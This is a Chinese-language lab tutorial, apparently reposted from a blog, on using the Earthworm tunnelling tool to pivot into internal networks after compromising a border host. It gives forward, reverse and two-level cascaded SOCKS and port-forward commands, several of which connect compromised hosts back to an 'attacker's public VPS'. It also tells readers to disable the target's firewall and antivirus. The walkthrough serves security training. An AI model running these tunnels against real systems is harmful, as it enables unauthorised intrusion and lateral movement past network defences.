狠狠色丁香婷婷综合尤物/久久精品综合一区二区三区/中国有色金属学报/国产日韩欧美在线观看 - 国产一区二区三区四区五区tv

LOGO OA教程 ERP教程 模切知識交流 PMS教程 CRM教程 開發文檔 其他文檔  
 
網站管理員

【內網—內網轉發】代理轉發軟件EW(Earthworm)

admin
2023年10月23日 18:48 本文熱度 1043

文章目錄

    • 1. 一級代理:

    • 2. 二級代理(一):

    • 3. 二級代理(二):

    • 1.1 場景:

    • 1.2 網絡拓撲圖:

    • 1.3 說明:

    • 1.4 實驗過程:

    • 2.1 場景:

    • 2.2 網絡拓撲圖:

    • 2.3 說明:

    • 2.4 實驗過程:

    • 3.1 場景:

    • 3.2 網絡拓撲圖:

    • 3.3 說明:

    • 3.4 實驗過程:

    • 1. 場景:

    • 2. 網絡拓撲圖:

    • 3. 說明:

    • 4. 實驗過程:

    • 一、環境準備:

    • 二、工具:

    • 三、概念:

    • 四、學習目的:

    • 五、ew(Earthworm)介紹:

    • 六、ew(Earthworm)使用說明:

    • 七、ew(Earthworm)正向代理(適用于被控服務器擁有一個公網IP):

    • 八、ew(Earthworm)反向代理:

一、環境準備:

  關閉靶機電腦的防火墻及病毒和威脅防護的實時防護。
  開啟內網主機的遠程桌面。

二、工具:

ew(Earthworm)內網穿透工具
proxifier代理工具客戶端

三、概念:

  內網滲透不光只是反彈一個shell,反彈一個端口,我們更需要對內網進行更深一步的掃描和滲透,這時候就需要找到一個代理服務器,充當外網和內網數據轉發的節點,通過這個被我們控制的服務器,把所在網段的流量轉發到公網(互聯網)。
  所以出現了反彈代理,也叫反彈socket。

四、學習目的:

  在我們進行滲透測試過程中,獲得了目標服務器的getshell權限后,要對內網其它服務器或者主機進一步滲透;這樣的話,需要對其他主機進行信息收集,端口、服務探測及漏洞掃描等操作。
  進行這樣操作,只進行反彈shell和端口轉發已經不能滿足需求,需要進一步進行反彈代理,通過我們控制的目標服務器,把目標服務器作為代理服務器,充當外網和內網數據轉發的節點,把所在內網網段的流量引出到公網,這樣的話,就方便我們對目標服務器所在內網網段的其他主機進行探測及漏洞利用了。

五、ew(Earthworm)介紹:

  EW 是一套便攜式的網絡穿透工具,具有 SOCKS v5服務架設和端口轉發兩大核心功能,可在復雜網絡環境下完成網絡穿透。
  該工具能夠以“正向”、“反向”、“多級級聯”等方式打通一條網絡隧道,直達網絡深處,用蚯蚓獨有的手段突破網絡限制,給防火墻松土。
  工具包中提供了多種可執行文件,以適用不同的操作系統,Linux、Windows、MacOS、Arm-Linux 均被包括其內。

六、ew(Earthworm)使用說明:

  該工具共有 6 種命令格式(ssocksd、rcsocks、rssocks、lcx_slave、lcx_listen、lcx_tran)。

D:\ew>ew_for_Win.exe -h

版本:free1.2

./xxx ([-options] [values])*

選項 :

例如:./xxx -s ssocksd -h

-s   指定工作模式。工作模式支持如下:ssocksd , rcsocks , rssocks ,lcx_listen , lcx_tran , lcx_slavessocksd     創建正向socks代理服務端,監聽在本地,直接把當前環境socks代理出去。rssocks     創建反向socks代理服務端rcsocks     反向socks代理客戶端lcx_tran    正向tcp端口轉發,監聽在本地lcx_slave   反向tcp轉發客戶端lcx_listen  反向tcp服務端-l   listenport為服務器打開一個監聽端口。

-d   refhost 設置反射主機地址。

-e   refport 設置反射端口。

-f   connhost 設置連接主機地址。

-g   connport 設置連接端口。

-h   help 顯示幫助文本,通過添加 -s 參數,您還可以查看更詳細的幫助。

-a   about 顯示關于頁面

-v   version 顯示版本。

-t   usectime 設置超時的毫秒數。 默認的值為 1000

可以參考:http://rootkiter.com/EarthWorm/

七、ew(Earthworm)正向代理(適用于被控服務器擁有一個公網IP):

1. 場景:

  目標網絡邊界服務器存在公網IP且可任意開監聽端口。

角色系統網卡IP(網段)
攻擊機windows10虛擬機NAT192.168.100.151
被控主機1windows08虛擬機NAT
VMnet1
192.168.100.158(公網IP)
172.16.10.10
內網主機windows03虛擬機VMnet1172.16.10.11

2. 網絡拓撲圖:

3. 說明:

  正向代理是服務器開放監聽端口,客戶端(攻擊者)主動連接服務器的端口。
  適用于被控服務器擁有一個公網IP。

4. 實驗過程:

1、在被控主機使用ew打開一個監聽端口:
命令:

ew_for_Win.exe -s ssocksd -l 6666
-s          指定工作模式
ssocksd     創建正向socks代理服務端,監聽在本地,直接把當前環境socks代理出去
-l          listenport為服務器打開一個監聽端口


2、查看監聽端口是否打開,可以看出監聽端口已經打開:


3、使用proxifier代理工具客戶端連接ew(Earthworm)的正向連接服務端:

在進行測試時可以出現無法連通的現象,這時需要在【被控主機1】的ew命令行里面敲一下回車鍵:

4、在攻擊機上面連接被控服務器所在內網段的內網主機172.16.10.11:

八、ew(Earthworm)反向代理:

1. 一級代理:

1.1 場景:

  目標網絡邊界不存在公網IP,能夠訪問內網資源,可以訪問公網,需要通過反彈方式創建 socks 代理。

角色系統網卡IP(網段)
攻擊機windows10虛擬機NAT192.168.100.151
攻擊者的公網vpswindows10虛擬機NAT192.168.100.152
被控主機1windows08虛擬機NAT
VMnet1
192.168.100.158
172.16.10.10
內網主機windows03虛擬機VMnet1172.16.10.11

1.2 網絡拓撲圖:

1.3 說明:

  反向代理是客戶端開發端口,服務器連接客戶端。
   適用于目標機器沒有公網IP,但可訪問內網資源。

1.4 實驗過程:

1、在攻擊者的公網vps上添加轉接隧道,將6666收到的代理請求轉交給反連8888端口的被控服務器:
命令:

ew_for_Win.exe -s rcsocks -l 6666 -e 8888
-s          指定工作模式
rcsocks     反向socks代理客戶端
-l          listenport在代理客戶端設置監聽端口,將6666收到的 代理請求 轉交給反連8888端口的被控服務器。
-e          refport設置反彈端口,用于接收被控服務器反彈過來的代理流量。

2、在被控服務器上啟動SOCKS v5服務并反彈到公網vps主機的8888端口

命令:

ew_for_Win.exe -s rssocks -d 192.168.100.152 -e 8888
-s          指定工作模式
rssocks     創建反向socks代理服務端
-d          refhost設置反彈主機地址(IP)。
-e          refport設置反彈端口,反彈給公網vps開啟的8888端口。

3、在公網vps出現以下界面,說明連接成功:

4、使用proxifier代理工具客戶端連接公網vps上ew(Earthworm)的監聽的端口:


在進行測試時可以出現無法連通的現象,這時需要在【攻擊者的公網vps】的ew命令行里面敲一下回車鍵:

5、在攻擊機上面連接被控服務器所在內網段的內網主機172.16.10.11:

2. 二級代理(一):

2.1 場景:

  在獲得邊界服務器【被控主機1】的webshell后,通過橫向移動到內網環境1中的【被控主機2】,發現【被控主機2】同時處于另一個內網環境2中,但【被控主機2】所處的內網環境2無法訪問公網,公網也無法訪問【被控主機2】所在內網環境2 ,【被控主機2】卻可以單向訪問【被控主機1】,這時需要把【被控主機2】所在的內網環境2的流量代理出來。

角色系統網卡IP(網段)
攻擊機windows10虛擬機NAT192.168.100.151
攻擊者的公網vpswindows10虛擬機NAT192.168.100.152
被控主機1windows08虛擬機NAT
VMnet1
192.168.100.158
172.16.10.10
被控主機2windows08虛擬機VMnet1
VMnet2
172.16.10.11
10.1.1.1
內網主機windows03虛擬機VMnet1172.16.10.11

2.2 網絡拓撲圖:

2.3 說明:

  反向代理是客戶端開發端口,服務器連接客戶端。
   適用于目標機器沒有公網IP,但可訪問內網資源。

2.4 實驗過程:

1、在公網vps添加轉接隧道,將6666端口收到的代理請求流量轉交給反連8888端口的被控主機:
命令:

ew_for_Win.exe -s rcsocks -l 6666 -e 8888
-s          指定工作模式
rcsocks     反向socks代理客戶端
-l          listenport在代理客戶端設置監聽端口,將6666收到的 代理請求 轉交給反連8888端口的被控服務器。
-e          refport設置反彈端口,用于接收被控服務器反彈過來的代理流量。

2、在被控服主機1上啟動監聽本機端口9999,并將9999端口接收到的代理流量,轉發給攻擊者的公網vps的8888端口:
命令:

ew_for_Win.exe -s lcx_tran -l 被控主機1本機端口 -f 攻擊者的公網vps_IP -g 8888ew_for_Win.exe -s lcx_tran -l 9999 -f 192.168.100.152 -g 8888-s          指定工作模式
rssocks     創建反向socks代理服務端
-l          listenport在被控主機1上設置監聽端口9999,將9999收到的 代理請求 轉交給攻擊者的公網vps的8888端口。
-f          connhost 設置連接主機地址(IP)。
-g          connport 設置連接端口。
這個命令的意思就是,把本機9999接收到的代理流量,轉發到攻擊者公網vps的192.168.100.152的8888端口上。

3、在被控主機2啟動SOCKS v5代理服務端,并反彈到被控主機1的8888端口 :

ew_for_Win.exe -s rssocks -d 172.16.10.10 -e 9999
-s          指定工作模式
rssocks     創建反向socks代理服務端
-d          refhost設置反彈主機地址(IP)。
-e          refport設置反彈端口,反彈給公網vps開啟的8888端口。
這個命令的意思就是在被控主機2啟動SOCKS v5代理服務端,把本機的代理流量反向代理到被控服務器1的9999端口。

4、使用proxifier代理工具客戶端連接公網vps上ew(Earthworm)的監聽的端口:

5、在攻擊機上面連接第二級內網被控主機所在內網段的內網主機10.1.1.2:


3. 二級代理(二):

3.1 場景:

  在獲得邊界服務器【被控主機1】的webshell后,發現被控主機1沒有公網IP,但處于邊界的【被控主機1】可訪問公網;攻擊者通過橫向移動到內網環境1中的【被控主機2】,發現【被控主機2】同時處于另一個內網環境2中,但【被控主機2】所處的內網環境2無法訪問公網,公網也無法訪問【被控主機2】所在內網環境2 ,但處于邊界的【被控主機1】卻可以單向訪問【被控主機2】所處的內網環境2,這時需要把【被控主機2】所在的內網環境2的流量代理出來。

角色系統網卡IP(網段)
攻擊機windows10虛擬機NAT192.168.100.151
攻擊者的公網vpswindows10虛擬機NAT192.168.100.152
被控主機1windows08虛擬機NAT
VMnet1
192.168.100.158
172.16.10.10
被控主機2windows08虛擬機VMnet1
VMnet2
172.16.10.11
10.1.1.1
內網主機windows03虛擬機VMnet110.1.1.2

3.2 網絡拓撲圖:

3.3 說明:

  反向代理是客戶端開發端口,服務器連接客戶端。
   適用于目標機器沒有公網IP,但可訪問內網資源。

3.4 實驗過程:

1、在攻擊者的公網vps添加轉接隧道,通過ew的lcx_listen模塊監聽本機的6666端口,把6666端口接受到的代理請求,轉發到反連8888端口的主機:
命令:

ew_for_Win.exe -s lcx_listen -l 6666 -e 8888
-s          指定工作模式
lcx_listen  反向tcp服務端
-l          listenport在代理客戶端設置監聽端口,將6666收到的 代理請求 轉交給反連8888端口的被控服務器。
-e          refport設置反彈端口,用于接收被控服務器反彈過來的代理流量。

2、在內網環境2中的【被控主機2】上通過ssocksd模塊,開啟正向代理服務,通過ssocksd模塊監聽【被控主機2】本機的9999端口,通過正向代理,把外流量引向內網:
命令:

ew_for_Win.exe -s ssocksd -l 9999
-s          指定工作模式
ssocksd     創建正向socks代理服務端,監聽在本地,直接把當前環境socks代理出去
-l          listenport為服務器打開一個監聽端口

3、在內網環境1中的被控主機1運行以下命令,通過ew的lcx_slave流量轉發模塊,將正向連接到攻擊者的公網vps的8888端口,而獲得的代理請求流量,轉發給內網環境2的【被控主機2】,從而獲得內網環境2的內網流量:

ew_for_Win.exe -s lcx_slave -d 攻擊者的公網vps_IP -e 8888 -f 處于2級內網的被控主機 -g 9999
ew_for_Win.exe -s lcx_slave -d 192.168.100.152 -e 8888 -f 172.16.10.11 -g 9999
-s          指定工作模式
lcx_slave   反向tcp轉發客戶端
-d          refhost設置反彈主機地址(IP)。
-e          refport設置反彈端口,反彈給公網vps開啟的8888端口
-f          connhost 設置連接主機地址
-g          connport 設置連接端口

4、使用proxifier代理工具客戶端連接公網vps上ew(Earthworm)的監聽的端口:

5、在攻擊機上面連接第二級內網被控主機所在內網段的內網主機10.1.1.2:

文章來源:https://blog.csdn.net/weixin_45588247/article/details/120238795


該文章在 2023/10/23 18:48:34 編輯過
關鍵字查詢
相關文章
正在查詢...
點晴ERP是一款針對中小制造業的專業生產管理軟件系統,系統成熟度和易用性得到了國內大量中小企業的青睞。
點晴PMS碼頭管理系統主要針對港口碼頭集裝箱與散貨日常運作、調度、堆場、車隊、財務費用、相關報表等業務管理,結合碼頭的業務特點,圍繞調度、堆場作業而開發的。集技術的先進性、管理的有效性于一體,是物流碼頭及其他港口類企業的高效ERP管理信息系統。
點晴WMS倉儲管理系統提供了貨物產品管理,銷售管理,采購管理,倉儲管理,倉庫管理,保質期管理,貨位管理,庫位管理,生產管理,WMS管理系統,標簽打印,條形碼,二維碼管理,批號管理軟件。
點晴免費OA是一款軟件和通用服務都免費,不限功能、不限時間、不限用戶的免費OA協同辦公管理系統。
Copyright 2010-2025 ClickSun All Rights Reserved